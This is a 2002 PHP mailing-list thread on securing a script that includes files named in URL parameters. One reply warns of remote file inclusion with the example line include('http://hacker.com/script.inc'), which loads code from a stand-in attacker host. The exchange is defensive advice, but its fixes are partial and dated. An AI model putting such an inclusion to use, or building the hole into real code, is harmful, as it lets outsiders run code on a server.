so as my files are all .php I would be okay from an external hacking attempt?
I don't have any worry about internal as I am on a dedicated server
John
On Friday 04 Oct 2002 11:02 am, Justin French wrote:
> all my include files are *.inc, and I have a .htaccess file that makes
> apache refuse to serve those files directly thru http.
>
> Justin
>
> on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:
> > erm......would that alow hackers access? Say I have a database include
> > file would hackers be able to get access to my database like this?
> >
> > (include('http://mysite.com/datainc.php');)
> >
> > I hope bloody not!!! if so how on earth do i get round that!
> >
> > John
> >
> > On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> >> Use realpath() to check the path. I also suspect your script is
> >> vulnarable to cross-site includes
> >> (include('http://hacker.com/script.inc');)
> >>
> >> Rick Beckman wrote:
> >>> Okay, I was mistaken... There is a gaping security hole in my simple
> >>> li'l script... How do I modify it to only accept files from a certain
> >>> path? I want the url format to be script.php?call=1 where "1" is the
> >>> called file in the /includes/ directory. Just when I get optimistic I
> >>> leave the entire system exposed. Yeah, that fits with my luck. :-)
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
